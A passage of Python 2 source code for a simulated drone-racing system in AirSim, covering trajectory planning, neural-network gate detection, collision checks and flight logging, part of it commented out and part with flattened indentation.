#[arr[i][5],arr[i][6],arr[i][7],arr[i][8],arr[i][9],arr[i][10], arr[i][4],arr[i][11],arr[i][12],arr[i][13],arr[i][14],int(arr[i][16])]
X_test = np.array([posf[0]-pos0[0], posf[1]-pos0[1], posf[2]-pos0[2], -self.quad.state[3], -self.quad.state[4], yawf-yaw0,
covariance_sum, prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]]).reshape(1,-1)
X_mp_test = self.mp_scaler.transform(X_test)
X_time_test = self.time_scaler.transform(X_test)
mp_method = self.predict(X_mp_test, model=self.mp_classifier, isClassifier=True)
self.trajSelect[0] = labels_dict[mp_method]
self.trajSelect[1] = 2
self.trajSelect[2] = 0
if self.trajSelect[0] != -1:
print "Predicted MP Algorithm: ", self.MP_names[int(self.trajSelect[0])]
self.Tf = self.predict(X_time_test, model=self.time_regressor, isClassifier=False)
print "Time based trajectory, T: {0:.3}".format(self.Tf)
print "Predicted Time Length: {0:.3}".format(self.Tf)
if self.flight_log:
f.write("\nTime based trajectory, T: {0:.3}".format(self.Tf))
f.write("\nPredicted Time Length: {0:.3}".format(self.Tf))
else:
print "Drone is in Safe Mode"
if self.flight_log:
f.write("\nDrone is in Safe Mode")
if labels_dict[mp_method] == 5: #min_jerk
min_jerk_check = True
else:
self.trajSelect[0] = self.MP_methods[method]
self.trajSelect[1] = 2
self.trajSelect[2] = 0
self.Tf = self.time_coeff*abs(pose_gate_body[0][0])
#print "Prediction mode is off. MP algorithm: " + method
#print "Estimated time of arrival: " + str(self.Tf) + " s."
if self.flight_log:
f.write("\nPrediction mode is off. MP algorithm: " + method)
f.write("\nEstimated time of arrival: " + str(self.Tf) + " s.")
if method == "min_jerk":
min_jerk_check = True
if self.trajSelect[0] != -1:
velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
time_list = np.hstack((0., self.Tf)).astype(float)
waypoint_list = np.vstack((pos0, posf)).astype(float)
yaw_list = np.hstack((yaw0, yawf)).astype(float)
self.test_arrival_time[method] += self.Tf
if min_jerk_check:
mp_algorithm = MyTraj(gravity = -9.81)
traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
flight_period = self.Tf / self.period_denum
Waypoint_length = flight_period // self.dtau
if init_start:
t_list = linspace(0, flight_period, num = Waypoint_length)
init_start = False
else:
t_list = linspace(flight_period, 2*flight_period, num = Waypoint_length)
self.vel_sum = 0.
self.quad.costValue = 0.
# Call for Controller
for ind, t_current in enumerate(t_list):
self.vel_sum += (self.quad.state[6]**2+self.quad.state[7]**2+self.quad.state[8]**2)
pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
if min_jerk_check:
pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
psid = euler_des[2]
psid_dot = (psid - self.psid_pr) / self.dtau
psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
psid, psid_dot, psid_ddot]
fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
if ind % self.collision_check_interval == 0:
collision_check = self.check_collision()
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
self.test_states[method].append(self.quad.state)
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.xd_ddot_pr = xd_ddot
self.yd_ddot_pr = yd_ddot
self.xd_dddot_pr = xd_dddot
self.yd_dddot_pr = yd_dddot
self.psid_pr = psid
self.psid_dot_pr = psid_dot
self.x_dot_pr = self.quad.state[6]
self.y_dot_pr = self.quad.state[7]
self.z_dot_pr = self.quad.state[8]
if collision_check:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has collided with the gate! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has collided with the gate! Current cost: {0:.6}".format(self.test_costs[method]))
break
elif fail_check:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has crashed! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.test_costs[method]))
break
elif not anyGate:
self.quad.costValue = 1e12
self.test_costs[method] = self.quad.costValue
print "Drone has been out of the path! Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has been out of the path! Current cost: {0:.6}".format(self.test_costs[method]))
break
check_arrival = self.check_completion(quad_pose)
if check_arrival: # drone arrives to the gate
track_completed = True
self.vel_sum = self.vel_sum / (ind + 1)
self.test_costs[method] = self.Tf * self.quad.costValue
print "Drone has finished the lap. Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone has finished the lap. Current cost: {0:.6}".format(self.test_costs[method]))
break
if (not track_completed) and (not fail_check) and (not collision_check) and (anyGate): # drone didn't arrive or crash
self.vel_sum = self.vel_sum / Waypoint_length
#print "Velocity Sum (Normalized): ", self.vel_sum
self.test_costs[method] = self.Tf * self.quad.costValue
print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_costs[method])
if self.flight_log:
f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_costs[method]))
if track_completed or fail_check or collision_check or not anyGate: # drone arrived to the gate or crashed or collided
break
self.curr_idx += 1
if self.flight_log:
f.close()
def check_collision(self, max_distance = 0.15):
drone_x_range = [.1, -.1]
drone_y_range = [.1, -.1]
# drone_z_range = [.05, -.05]
rot_matrix = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]],degrees=False).as_dcm()
drone_pos = np.array([self.quad.state[0], self.quad.state[1], self.quad.state[2]])
edge_ind = 0
eps = 0.1
for i, line in enumerate(self.line_list):
distance = line.distance(Point3D(drone_pos[0], drone_pos[1], drone_pos[2])).evalf()
edge_i, edge_j, u_v = self.line_list_2[i]
distance_from_center = edge_i - drone_pos
distance_2 = np.linalg.norm(np.cross(distance_from_center, u_v)) / np.linalg.norm(u_v)
print "Edge: {0}, (Symbolic) Distance from the center: {1:.3}".format(i, distance)
print "Edge: {0}, (Numeric) Distance from the center: {1:.3}".format(i, distance_2)
if distance < max_distance:
print "Collision detected!"
#print "Index: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2])
return True
# for x_rng in drone_x_range:
# for y_rng in drone_y_range:
# # for z_rng in drone_z_range:
# drone_range = np.array([x_rng, y_rng, 0.])
# drone_range_world = np.dot(rot_matrix, drone_range.reshape(-1,1)).ravel()
# drone_edge_point = np.array([drone_pos[0]+drone_range_world[0], drone_pos[1]+drone_range_world[1], drone_pos[2]+drone_range_world[2]])
# edge_ind += 1
# for i, line in enumerate(self.line_list):
# distance = line.distance(Point3D(drone_edge_point[0], drone_edge_point[1], drone_edge_point[2])).evalf()
# #print "Edge: {0}, Distance from the center: {1:.3}".format(i, distance)
# if distance < max_distance:
# print "Collision detected!"
# print "Ind: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2])
# return True
#print "No Collision!"
return False
# def fly_drone(self, f, gate_index, method, pos_ranges, angles_start):
# pose_prediction = np.zeros((2000,4),dtype=np.float32)
# prediction_std = np.zeros((4,1),dtype=np.float32)
# x_range, y_range, z_range = pos_ranges
# phi_start, theta_start, gate_psi, psi_start = angles_start
# if gate_index == 0: #if drone is at initial point
# quad_pose = [self.drone_init.position.x_val+x_range, self.drone_init.position.y_val+y_range, self.drone_init.position.z_val+z_range, -phi_start, -theta_start, psi_start]
# self.state0 = [self.drone_init.position.x_val+x_range, self.drone_init.position.y_val+y_range, self.drone_init.position.z_val+z_range, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
# true_init_pos = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val]
# else:
# quad_pose = [self.track[gate_index-1].position.x_val+x_range, self.track[gate_index-1].position.y_val+y_range, self.track[gate_index-1].position.z_val+z_range, -phi_start, -theta_start, psi_start]
# self.state0 = [self.track[gate_index-1].position.x_val+x_range, self.track[gate_index-1].position.y_val+y_range, self.track[gate_index-1].position.z_val+z_range, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
# true_init_pos = [self.track[gate_index-1].position.x_val, self.track[gate_index-1].position.y_val, self.track[gate_index-1].position.z_val]
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# self.quad = Quadrotor(self.state0)
# # this is only used for yaw motion planning
# self.trajSelect[0] = self.MP_methods[method]
# self.trajSelect[1] = 2
# self.trajSelect[2] = 0
# self.curr_idx = 0
# #self.Controller_states[method].append(self.quad.state)
# self.MP_states[method].append(self.quad.state)
# self.xd_ddot_pr = 0.
# self.yd_ddot_pr = 0.
# self.xd_dddot_pr = 0.
# self.yd_dddot_pr = 0.
# self.psid_pr = 0.
# self.psid_dot_pr = 0.
# cov_coeff = 0.
# initial_start = True
# final_target = [self.track[gate_index].position.x_val, self.track[gate_index].position.y_val, self.track[gate_index].position.z_val]
# print "\n>>>MP Method: ", method
# track_completed = False
# fail_check = False
# if self.flight_log:
# f.write("\n\n>>>MP Method: %s " %method)
# while((not track_completed) and (not fail_check)):
# image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
# #if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
# img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
# img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
# img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
# #cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
# img = Image.fromarray(img_rgb)
# image = self.transformation(img)
# quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
# with torch.no_grad():
# # Determine Gat location with Neural Networks
# pose_gate_body = self.Dronet(image)
# for i,num in enumerate(pose_gate_body.reshape(-1,1)):
# #print(num, i , self.curr_idx)
# pose_prediction[self.curr_idx][i] = num.item()
# if self.curr_idx >= 11:
# pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
# for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
# prediction_std[i] = p_g_c.item()
# # Gate ground truth values will be implemented
# pose_gate_body = pose_gate_body.numpy().reshape(-1,1)
# prediction_std = np.clip(prediction_std, 0, prediction_std)
# prediction_std = prediction_std.ravel()
# covariance_sum = np.sum(prediction_std)
# # r,theta,psi,phi = pose_gate_body[0][0],pose_gate_body[1][0],pose_gate_body[2][0],pose_gate_body[3][0] # notation is different. In our case, phi equals to psi
# # q1,q2,q3,q4 = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]], degrees=False).as_quat()
# # quad_pose = Pose(Vector3r(self.quad.state[0], self.quad.state[1],self.quad.state[2]),Quaternionr(q1,q2,q3,q4))
# # estimation = geom_utils.debugGatePoses(quad_pose , r, theta, psi)
# # Trajectory generate
# self.Tf = self.time_coeff*pose_gate_body[0][0] # T=r*0.5
# waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
# pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
# vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
# #acc0 = [float(self.quad.state[6]-self.x_dot_pr)/self.dtau, float(self.quad.state[7]-self.y_dot_pr)/self.dtau, float(self.quad.state[8]-self.z_dot_pr)/self.dtau]
# acc0 = [0., 0., 0.]
# yaw0 = self.quad.state[5]
# posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
# velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
# accf = [0., 0., 0.]
# yaw_diff = pose_gate_body[3][0]
# yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
# pos_next = np.array(velf) * self.Tf
# time_list = np.hstack((0., self.Tf, 2*self.Tf)).astype(float)
# waypoint_list = np.vstack((pos0, posf, pos_next)).astype(float)
# yaw_list = np.hstack((yaw0, yawf, yawf)).astype(float)
# newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
# print "\nTime of arrival: {0:.3} s., time coefficient: {1:.3}".format(self.Tf, self.time_coeff)
# print "Gate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
# print "Gate Ground truth, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(final_target[0], final_target[1], final_target[2], (gate_psi-np.pi/2)*180/np.pi)
# print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
# print "Blurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range)
# if self.flight_log:
# f.write("\nTime of arrival: {0:.3}, time coefficient: {1:.3}".format(self.Tf, self.time_coeff))
# f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
# f.write("\nGate Ground truth, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(self.track[gate_index].position.x_val, self.track[gate_index].position.y_val, self.track[gate_index].position.z_val, (gate_psi-np.pi/2)*180/np.pi))
# f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
# f.write("\nBlurring coefficient: {0:.3}".format(self.blur_coeff))
# # if initial_start:
# # init_time = 0.
# # initial_start = False
# # else:
# # init_time = newTraj.t_wps[1] / 6.0
# Waypoint_length = newTraj.t_wps[1] // self.dtau
# t_list = linspace(0., newTraj.t_wps[1], num = Waypoint_length)
# # if time_or_speed == 0:
# # newTraj = Trajectory(self.trajSelect, self.quad.state, self.Tf, pos0, posf, yaw0, yawf)
# # print "Time based trajectory, T: {0:.3}".format(newTraj.t_wps[1])
# # if self.flight_log:
# # f.write("Time based trajectory, T: {0:.3}".format(newTraj.t_wps[1]))
# # else:
# # newTraj = Trajectory(self.trajSelect, self.quad.state, 1.0, pos0, posf, yaw0, yawf, v_average=self.v_average)
# # print "Velocity based trajectory, V_avg: {0:.3}, T: {1:.3}".format(self.v_average, newTraj.t_wps[1])
# # if self.flight_log:
# # f.write("Velocity based trajectory, V_avg: {0:.3}, T: {1:.3}".format(self.v_average, newTraj.t_wps[1]))
# # mp_algorithm = MyTraj(gravity = -9.81)
# # traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
# # Waypoint_length = int(self.Tf / self.dtau)
# # t_list = linspace(0., self.Tf, num = Waypoint_length)
# for t_current in t_list:
# pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
# #pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
# xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
# xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
# xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
# xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
# yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
# xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
# yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
# psid = euler_des[2]
# psid_dot = (psid - self.psid_pr) / self.dtau
# psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
# current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
# xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
# psid, psid_dot, psid_ddot]
# fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
# quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
# self.MP_states[method].append(self.quad.state)
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# self.xd_ddot_pr = xd_ddot
# self.yd_ddot_pr = yd_ddot
# self.xd_dddot_pr = xd_dddot
# self.yd_dddot_pr = yd_dddot
# self.psid_pr = psid
# self.psid_dot_pr = psid_dot
# if fail_check:
# self.MP_cost[method] = self.quad.costValue
# print "Drone has crashed! Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.MP_cost[method]))
# break
# check_arrival, on_road = self.check_completion(quad_pose, gate_index=gate_index)
# if check_arrival: # drone arrives to the gate
# track_completed = True
# self.MP_cost[method] = self.Tf * self.quad.costValue + cov_coeff*np.sum(prediction_std)
# print "Drone has arrived to the {0}. gate. Current cost: {1:.6}".format(gate_index+1, self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone has arrived to the {0}. gate. Current cost: {1:.6}".format(gate_index+1, self.MP_cost[method]))
# break
# elif not on_road: #drone can not complete the path, but still loop should be ended
# track_completed = True
# self.MP_cost[method] = self.quad.costValue
# print "Drone is out of the path. Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone is out of the path. Current cost: {0:.6}".format(self.MP_cost[method]))
# break
# if (not track_completed) and (not fail_check): # drone didn't arrive or crash
# self.MP_cost[method] = self.Tf * self.quad.costValue + cov_coeff*np.sum(prediction_std)
# print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.MP_cost[method])
# if self.flight_log:
# f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.MP_cost[method]))
# self.write_stats(flight_columns,
# [true_init_pos[0], true_init_pos[1], true_init_pos[2], posf[0]-pos0[0], posf[1]-pos0[1], posf[2]-pos0[2], -phi_start, -theta_start, yawf-yaw0,
# prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3], self.Tf, method, self.MP_cost[method]], flight_filename)
# #print "Flight data is written to the file"
# self.quad.costValue = 0.
# if track_completed or fail_check: # drone arrived to the gate or crashed
# break
# self.curr_idx += 1
def fly_drone_2(self, f, method, pos_offset, angle_start):
    """Fly the drone one lap from the initial pose using a fixed MP method.

    Each outer-loop iteration grabs a camera frame, runs the Dronet network
    (plus an LSTM covariance estimator once 12 predictions exist), builds a
    trajectory toward the current gate, and steps the simulated quadrotor
    along it while mirroring the state into AirSim.

    Args:
        f: open flight-log file handle; written to only when self.flight_log.
        method: motion-planning method name. "min_jerk" uses MyTraj;
            any other name is looked up in self.MP_methods.
        pos_offset: (x, y, z) offset added to the initial drone position.
        angle_start: (phi, theta, gate_psi, psi) start angles; gate_psi is
            unpacked but never used in this method.

    Side effects: resets/advances self.quad, appends to self.test_states,
    sets self.test_cost, and moves the vehicle via self.client.
    """
    pose_prediction = np.zeros((1000,4),dtype=np.float32)
    prediction_std = np.zeros((4,1),dtype=np.float32)
    x_offset, y_offset, z_offset = pos_offset
    phi_start, theta_start, gate_psi, psi_start = angle_start
    #if drone is at initial point
    # NOTE(review): quad_pose negates phi/theta while state0 keeps them
    # positive — presumably an AirSim vs. simulator sign convention; confirm.
    quad_pose = [self.drone_init.position.x_val+x_offset, self.drone_init.position.y_val+y_offset, self.drone_init.position.z_val+z_offset, -phi_start, -theta_start, psi_start]
    self.state0 = [self.drone_init.position.x_val+x_offset, self.drone_init.position.y_val+y_offset, self.drone_init.position.z_val+z_offset, phi_start, theta_start, psi_start, 0., 0., 0., 0., 0., 0.]
    self.client.simSetVehiclePose(QuadPose(quad_pose), True)
    self.quad = Quadrotor(self.state0)
    self.curr_idx = 0
    self.test_states.append(self.quad.state)
    # Previous-step derivatives used for finite-difference jerk/snap below.
    self.xd_ddot_pr = 0.
    self.yd_ddot_pr = 0.
    self.xd_dddot_pr = 0.
    self.yd_dddot_pr = 0.
    self.psid_pr = 0.
    self.psid_dot_pr = 0.
    self.blur_range = 0.01
    # Random blur coefficient in [0, blur_range) for this flight.
    self.blur_coeff = random.uniform(0, self.blur_range)
    track_completed = False
    fail_check = False
    final_target = [self.track[-1].position.x_val, self.track[-1].position.y_val, self.track[-1].position.z_val]
    self.trajSelect[0] = 3 #min_vel
    self.trajSelect[1] = 2 #yaw_follow
    self.trajSelect[2] = 0 #time based
    while((not track_completed) and (not fail_check)):
        image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
        #if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
        # NOTE(review): np.fromstring is deprecated in favor of np.frombuffer.
        img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
        img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
        img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
        #cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
        img = Image.fromarray(img_rgb)
        image = self.transformation(img)
        quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
        with torch.no_grad():
            # Determine gate location with the neural networks.
            pose_gate_body = self.Dronet(image)
            for i,num in enumerate(pose_gate_body.reshape(-1,1)):
                #print(num, i , self.curr_idx)
                pose_prediction[self.curr_idx][i] = num.item()
            # Covariance LSTM needs a 12-step history of predictions.
            if self.curr_idx >= 11:
                pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
                for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
                    prediction_std[i] = p_g_c.item()
        # Gate ground truth values will be implemented
        pose_gate_body = pose_gate_body.numpy().reshape(-1,1)
        # Clamp negatives to zero (upper bound equals the value itself).
        prediction_std = np.clip(prediction_std, 0, prediction_std)
        prediction_std = prediction_std.ravel()
        covariance_sum = np.sum(prediction_std)
        # Time of arrival scaled from the predicted range to the gate.
        self.Tf = self.time_coeff*pose_gate_body[0][0]
        # Trajectory generate
        waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
        # The Dronet prediction above is immediately overridden with the
        # ground-truth gate position (and yawf below with ground-truth yaw).
        waypoint_world = [self.track[self.current_gate].position.x_val, self.track[self.current_gate].position.y_val, self.track[self.current_gate].position.z_val]
        pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
        vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
        acc0 = [0., 0., 0.]
        posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
        velf = [float(posf[0]-pos0[0])/self.Tf, float(posf[1]-pos0[1])/self.Tf, float(posf[2]-pos0[2])/self.Tf]
        accf = [0., 0., 0.]
        yaw0 = self.quad.state[5]
        yaw_diff = pose_gate_body[3][0]
        yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
        # Overrides the predicted yawf with the gate's ground-truth yaw.
        yawf = Rotation.from_quat([self.track[self.current_gate].orientation.x_val, self.track[self.current_gate].orientation.y_val,
                                   self.track[self.current_gate].orientation.z_val, self.track[self.current_gate].orientation.w_val]).as_euler('ZYX',degrees=False)[0] - np.pi/2
        print "MP algorithm: " + method
        print "Estimated time of arrival: " + str(self.Tf) + " s."
        if self.flight_log:
            f.write("\nPrediction mode is off. MP algorithm: " + method)
            f.write("\nEstimated time of arrival: " + str(self.Tf) + " s.")
        print "\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
        print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
        print "Blurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range)
        if self.flight_log:
            f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
            f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
            f.write("\nBlurring coefficient: {0:.3}/{1:.3}".format(self.blur_coeff,self.blur_range))
        # min_jerk bypasses the Trajectory planner's waypoints below and
        # samples MyTraj instead; other methods select an MP index.
        if method == "min_jerk":
            mp_algorithm = MyTraj(gravity = -9.81)
            traj = mp_algorithm.givemetraj(pos0, vel0, acc0, posf, velf, accf, self.Tf)
        else:
            self.trajSelect[0] = self.MP_methods[method]
        # pos_next = np.array(velf) * self.Tf
        # time_list = np.hstack((0., self.Tf, 2*self.Tf)).astype(float)
        # waypoint_list = np.vstack((pos0, posf, pos_next)).astype(float)
        time_list = np.hstack((0., self.Tf)).astype(float)
        waypoint_list = np.vstack((pos0, posf)).astype(float)
        yaw_list = np.hstack((yaw0, yawf)).astype(float)
        newTraj = Trajectory(self.trajSelect, self.quad.state, time_list, waypoint_list, yaw_list)
        Waypoint_length = int(self.Tf / self.dtau)
        t_list = linspace(0., self.Tf, num = Waypoint_length)
        # Call for Controller
        for t_current in t_list:
            pos_des, vel_des, acc_des, euler_des = newTraj.desiredState(t_current, self.dtau, self.quad.state)
            if method == "min_jerk":
                pos_des, vel_des, acc_des = mp_algorithm.givemepoint(traj, t_current)
            xd, yd, zd = pos_des[0], pos_des[1], pos_des[2]
            xd_dot, yd_dot, zd_dot = vel_des[0], vel_des[1], vel_des[2]
            xd_ddot, yd_ddot, zd_ddot = acc_des[0], acc_des[1], acc_des[2]
            # Finite-difference jerk and snap from the previous step.
            xd_dddot = (xd_ddot - self.xd_ddot_pr) / self.dtau
            yd_dddot = (yd_ddot - self.yd_ddot_pr) / self.dtau
            xd_ddddot = (xd_dddot - self.xd_dddot_pr) / self.dtau
            yd_ddddot = (yd_dddot - self.yd_dddot_pr) / self.dtau
            psid = euler_des[2]
            psid_dot = (psid - self.psid_pr) / self.dtau
            psid_ddot = (psid_dot - self.psid_dot_pr) / self.dtau
            current_traj = [xd, yd, zd, xd_dot, yd_dot, zd_dot, xd_ddot, yd_ddot, zd_ddot,
                            xd_dddot, yd_dddot, xd_ddddot, yd_ddddot,
                            psid, psid_dot, psid_ddot]
            fail_check = self.quad.simulate(self.dtau, current_traj, final_target, prediction_std)
            quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
            self.test_states.append(self.quad.state)
            self.client.simSetVehiclePose(QuadPose(quad_pose), True)
            # Roll the previous-step derivative state forward.
            self.xd_ddot_pr = xd_ddot
            self.yd_ddot_pr = yd_ddot
            self.xd_dddot_pr = xd_dddot
            self.yd_dddot_pr = yd_dddot
            self.psid_pr = psid
            self.psid_dot_pr = psid_dot
            self.x_dot_pr = self.quad.state[6]
            self.y_dot_pr = self.quad.state[7]
            self.z_dot_pr = self.quad.state[8]
            if fail_check:
                self.test_cost = self.quad.costValue
                print "Drone has crashed! Current cost: {0:.6}".format(self.test_cost)
                if self.flight_log:
                    f.write("\nDrone has crashed! Current cost: {0:.6}".format(self.test_cost))
                break
            check_arrival, on_road = self.check_completion(quad_pose, -1, test_control = True)
            if check_arrival: # drone arrives to the gate
                track_completed = True
                # Cost is scaled by the trajectory's planned duration.
                self.test_cost = newTraj.t_wps[1] * self.quad.costValue
                print "Drone has arrived finished the lap. Current cost: {0:.6}".format(self.test_cost)
                if self.flight_log:
                    f.write("\nDrone has finished the lap. Current cost: {0:.6}".format(self.test_cost))
                break
            elif not on_road: #drone can not complete the path, but still loop should be ended
                track_completed = True
                self.test_cost = self.quad.costValue
                print "Drone is out of the path. Current cost: {0:.6}".format(self.test_cost)
                if self.flight_log:
                    f.write("\nDrone is out of the path. Current cost: {0:.6}".format(self.test_cost))
                break
        if (not track_completed) and (not fail_check): # drone didn't arrive or crash
            self.test_cost = newTraj.t_wps[1] * self.quad.costValue
            print "Drone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_cost)
            if self.flight_log:
                f.write("\nDrone hasn't reached the gate yet. Current cost: {0:.6}".format(self.test_cost))
        if track_completed or fail_check: # drone arrived to the gate or crashed
            break
        self.curr_idx += 1
# def visualize_drone(self, MP_list):
# for algorithm in MP_list:
# print "Drone flies by the algorithm, ", algorithm
# self.client.simSetVehiclePose(self.drone_init, True)
# state_list = self.MP_states[algorithm]
# for state in state_list:
